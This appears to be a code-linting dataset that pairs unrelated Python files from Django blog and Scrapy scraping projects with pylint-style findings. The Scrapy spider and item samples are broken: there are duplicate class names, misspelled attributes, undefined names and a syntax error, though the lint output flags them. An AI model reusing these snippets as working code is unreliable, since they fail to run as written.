36 pipeline_function = models.TextField(blank=True) 37 project = models.ForeignKey(Project, on_delete=models.CASCADE) 38 39 def __str__(self): 40 return self.pipeline_name 41 42 43 class LinkgenDeploy(models.Model): 44 project = models.ForeignKey(Project, on_delete=models.CASCADE) 45 success = models.BooleanField(blank=False) 46 date = models.DateTimeField(auto_now_add=True) 47 version = models.IntegerField(blank=False, default=0) 48 49 50 class ScrapersDeploy(models.Model): 51 project = models.ForeignKey(Project, on_delete=models.CASCADE) 52 success = models.TextField(blank=True) 53 date = models.DateTimeField(auto_now_add=True) 54 version = models.IntegerField(blank=False, default=0) 55 56 57 class Dataset(models.Model): 58 user = models.ForeignKey(User) 59 database = models.CharField(max_length=50)
5 - refactor: too-few-public-methods 17 - refactor: too-few-public-methods 25 - refactor: too-few-public-methods 33 - refactor: too-few-public-methods 43 - refactor: too-few-public-methods 50 - refactor: too-few-public-methods 57 - refactor: too-few-public-methods
1 # -*- coding: utf-8 -*- 2 """ 3 ------------------------------------------------- 4 File Name: custom_filter.py 5 Description : 6 Author : JHao 7 date: 2017/4/14 8 ------------------------------------------------- 9 Change Activity: 10 2017/4/14: 11 ------------------------------------------------- 12 """ 13 __author__ = 'JHao' 14 15 import markdown 16 from django import template 17 from django.utils.safestring import mark_safe 18 from django.template.defaultfilters import stringfilter 19 20 register = template.Library() 21 22 23 @register.filter 24 def slice_list(value, index): 25 return value[index] 26 27 28 @register.filter(is_safe=True) 29 @stringfilter 30 def custom_markdown(value): 31 content = mark_safe(markdown.markdown(value, 32 output_format='html5', 33 extensions=[ 34 'markdown.extensions.extra', 35 'markdown.extensions.fenced_code', 36 'markdown.extensions.tables', 37 ], 38 safe_mode=True, 39 enable_attributes=False)) 40 return content 41 42 43 @register.filter 44 def tag2string(value): 45 """ 46 将Tag转换成string >'python,爬虫' 47 :param value: 48 :return: 49 """ 50 return ','.join([each.get('tag_name', '') for each in value]) 51 52 53 if __name__ == '__main__': 54 pass
Clean Code: No Issues Detected
1 import scrapy 2 from scrapy.spiders import CSVFeedSpider 3 from scrapy.spiders import SitemapSpider 4 5 from scrapy.spiders import CrawlSpider,Rule 6 from scrapy.linkextractor import LinkExtractor 7 from tuto.items import DemoItem 8 from scrapy.loader import ItemLoader 9 from tuto.items import Demo 10 11 class DemoSpider(CrawlSpider): 12 name='demo' 13 allowed_domais=["www.tutorialspoint.com"] 14 start_url=["https://www.tutorialspoint.com/scrapy/index.htm"] 15 16 def parse(self, response): 17 l = ItemLoader(item = Product(), response = response) 18 l.add_xpath("title", "//div[@class = 'product_title']") 19 l.add_xpath("title", "//div[@class = 'product_name']") 20 l.add_xpath("desc", "//div[@class = 'desc']") 21 l.add_css("size", "div#size]") 22 l.add_value("last_updated", "yesterday") 23 return l.load_item() 24 # loader = ItemLoader(item = Item()) 25 # loader.add_xpath('social''a[@class = "social"]/@href') 26 # loader.add_xpath('email','a[@class = "email"]/@href') 27 28 # rules =( 29 # Rule(LinkExtractor(allow=(),restrict_xpaths=(''))) 30 # ) 31 32 class DemoSpider(CSVFeedSpider): 33 name = "demo" 34 allowed_domains = ["www.demoexample.com"] 35 start_urls = ["http://www.demoexample.com/feed.csv"] 36 delimiter = ";" 37 quotechar = "'" 38 headers = ["product_title", "product_link", "product_description"] 39 40 def parse_row(self, response, row): 41 self.logger.info("This is row: %r", row) 42 item = DemoItem() 43 item["product_title"] = row["product_title"] 44 item["product_link"] = row["product_link"] 45 item["product_description"] = row["product_description"] 46 return item 47 48 class DemoSpider(SitemapSpider): 49 urls = ["http://www.demoexample.com/sitemap.xml"] 50 51 rules = [ 52 ("/item/", "parse_item"), 53 ("/group/", "parse_group"), 54 ] 55 56 def parse_item(self, response): 57 # you can scrap item here 58 59 def parse_group(self, response): 60 # you can scrap group here
59 - error: syntax-error
1 from django.contrib import admin 2 3 # Register your models here. 4 5 6 from blog.models import Tag, Article, Category 7 8 9 @admin.register(Article) 10 class ArticleAdmin(admin.ModelAdmin): 11 date_hierarchy = 'date_time' 12 list_display = ('title', 'category', 'author', 'date_time', 'view') 13 list_filter = ('category', 'author') 14 filter_horizontal = ('tag',) 15 16 17 @admin.register(Category) 18 class CategoryAdmin(admin.ModelAdmin): 19 pass 20 21 22 @admin.register(Tag) 23 class TagAdmin(admin.ModelAdmin): 24 pass
10 - refactor: too-few-public-methods 18 - refactor: too-few-public-methods 23 - refactor: too-few-public-methods
1 # -*- coding: utf-8 -*- 2 from __future__ import unicode_literals 3 4 from django.db import migrations, models 5 6 7 class Migration(migrations.Migration): 8 9 dependencies = [ 10 ('scrapyproject', '0004_pipeline_pipeline_function'), 11 ] 12 13 operations = [ 14 migrations.RemoveField( 15 model_name='project', 16 name='settings', 17 ), 18 migrations.AddField( 19 model_name='project', 20 name='settings_link_generator', 21 field=models.TextField(blank=True), 22 ), 23 migrations.AddField( 24 model_name='project', 25 name='settings_scraper', 26 field=models.TextField(blank=True), 27 ), 28 ]
7 - refactor: too-few-public-methods
1 2 import scrapy 3 4 5 class FirstScrapyItem(scrapy.Item): 6 # define the fields for your item here like: 7 8 item=DmozItem() 9 10 item ['title'] = scrapy.Field() 11 item ['url'] = scrapy.Field() 12 item ['desc'] = scrapy.Field() 13
8 - error: undefined-variable 5 - refactor: too-few-public-methods